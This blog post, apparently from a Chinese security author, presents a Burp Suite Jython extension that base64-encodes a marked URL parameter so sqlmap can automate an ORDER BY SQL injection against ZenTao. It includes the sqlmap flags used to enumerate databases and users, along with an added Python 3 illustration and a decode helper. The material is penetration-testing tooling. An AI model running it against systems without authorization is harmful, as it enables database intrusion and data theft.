Burp Suite plugin development series: a plugin that base64-encodes and replaces a specified parameter

1. The plugin that base64-encodes and replaces a specified parameter:
D:\plug_in\base64encode.py

2. Why develop this plugin?
Reference: D:\plug_in\header包头数据自动替换插件\test1.py
While testing an order by injection in ZenTao (禅道), I found that the submitted parameter is base64-encoded before it is sent. Since it is a recent MySQL version with no error-based injection, manual blind injection was simply an impossible task, so I thought of developing a Burp Suite plugin to automatically replace the specified parameter in the URL.

3. Sending the requests through the Burp Suite proxy:

// sqlmap settings (how to use sqlmap itself is not discussed here, please google it):
--dbms="mysql" --dbs --users --threads 10 --level 3 --hex --proxy="http://127.0.0.1:8080"

// Screenshot of the specified parameter being replaced (image not preserved in this copy):

#!/usr/bin/env python
# D:\plug_in\base64encode.py
# coding=utf8
# author: pt007@vip.sina.com
# Burp Suite extension (Jython / Python 2): base64-encodes the {...}-marked part
# of the request line before the request leaves Burp.

from burp import IBurpExtender
from burp import IHttpListener
from burp import IProxyListener
import re
import base64


def base64encode(m):
    # Encode the whole match, braces included. The base64 alphabet contains no
    # braces, so a request line that has already been rewritten is not matched again.
    return base64.b64encode(m.group())


class BurpExtender(IBurpExtender, IHttpListener, IProxyListener):

    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("base64encode")
        callbacks.registerHttpListener(self)
        callbacks.registerProxyListener(self)

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        # toolFlag 4 = Proxy, 32 = Intruder
        if toolFlag == 32 or toolFlag == 4:
            if messageIsRequest:  # handle the request
                rq = messageInfo.getRequest()
                analyzerq = self._helpers.analyzeRequest(rq)
                headers = analyzerq.getHeaders()
                body = rq[analyzerq.getBodyOffset():]

                print "\n------------------------------------------Original Header------------------------------------------"
                for header in headers:
                    print header
                print body.tostring()

                print "\n------------------------------------------Replaced Header------------------------------------------"
                data = body.tostring()
                # headers[0] is the request line, e.g. "GET /path?p={value} HTTP/1.1"
                url = headers[0]
                url = re.sub(r'{.*}', base64encode, url)
                headers[0] = url

                httpmsg = self._helpers.buildHttpMessage(headers, data)
                messageInfo.setRequest(httpmsg)
                # Read the request back and print the rewritten headers
                request = messageInfo.getRequest()
                analyzedRequest = self._helpers.analyzeRequest(request)
                for header in analyzedRequest.getHeaders():
                    print header
                print '\n' + data

            if not messageIsRequest:  # handle the response
                print "\n------------------------------------------Response------------------------------------------"
                response = messageInfo.getResponse()
                analyzedResponse = self._helpers.analyzeResponse(response)
                body = response[analyzedResponse.getBodyOffset():]
                body_string = body.tostring()
                for header in analyzedResponse.getHeaders():
                    print header
                print '\n' + body_string
                print "\n-------------------------------------------Response end--------------------------------------"

    # Implements the "Edited request" step of the Proxy tool
    def processProxyMessage(self, messageIsRequest, proxyMessage):
        if messageIsRequest:
            messageInfo = proxyMessage.getMessageInfo()
            try:
                request = messageInfo.getRequest()
                reqInfo = self._helpers.analyzeRequest(request)
                headers = reqInfo.getHeaders()
                body = request[reqInfo.getBodyOffset():]

                data = body.tostring()
                url = headers[0]
                url = re.sub(r'{.*}', base64encode, url)
                headers[0] = url
                newHttpMessage = self._helpers.buildHttpMessage(headers, data)
                tmpstr = self._helpers.bytesToString(newHttpMessage)
                print "\n-------------------------------------------Edited request--------------------------------------"
                print "[tmpstr]:\n" + tmpstr.encode('utf-8')
                messageInfo.setRequest(newHttpMessage)
                print "\n-------------------------------------------Edited request end-----------------------------------"

            except Exception as e:
                print e
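The request-line rewrite above, as an added stand-alone illustration (not part of the original post, and written for Python 3 rather than the Jython 2 that Burp runs): it applies the same `{...}` replacement to a constructed raw request, shows that the plugin's greedy `{.*}` pattern swallows everything between the first and last brace when a line carries two markers, and adds a decode helper a defender would use to see what the application actually receives behind such base64-wrapped values.

```python
import base64
import re

# Marker pattern exactly as the plugin uses it: greedy, so on a request line
# with two markers it spans from the first '{' to the last '}'.
GREEDY = re.compile(r'{.*}')
# Non-greedy alternative that encodes each {...} marker separately.
NON_GREEDY = re.compile(r'{.*?}')


def encode_marked(request_line, pattern=GREEDY):
    """Replace each marker with the base64 of the match, braces included (as the plugin does).
    Like the plugin, this does not URL-encode the '+', '/' and '=' characters base64 may emit."""
    return pattern.sub(lambda m: base64.b64encode(m.group().encode()).decode(), request_line)


def rewrite_request(raw, pattern=GREEDY):
    """Apply encode_marked to the request line (headers[0] in Burp terms) of a raw HTTP request."""
    head, sep, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    lines[0] = encode_marked(lines[0], pattern)
    return "\r\n".join(lines) + sep + body


def decode_param(value):
    """Defender side: decode a base64 query value to inspect what the application really
    received, e.g. when reviewing access logs or WAF events that only show the raw string.
    Returns None when the value is not valid base64 text."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    # Constructed sample request; host and path are placeholders.
    raw = "GET /item?sort={name} HTTP/1.1\r\nHost: app.example\r\n\r\n"
    once = rewrite_request(raw)
    print(once.split("\r\n")[0])          # GET /item?sort=e25hbWV9 HTTP/1.1
    print(rewrite_request(once) == once)  # True: no braces left, so a second pass changes nothing
    two = "GET /s?a={x}&b={y} HTTP/1.1"
    print(encode_marked(two))             # greedy: one base64 blob covering "{x}&b={y}"
    print(encode_marked(two, NON_GREEDY)) # GET /s?a=e3h9&b=e3l9 HTTP/1.1
```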
     
Original URL: https://www.cnblogs.com/pt007/p/11857215.html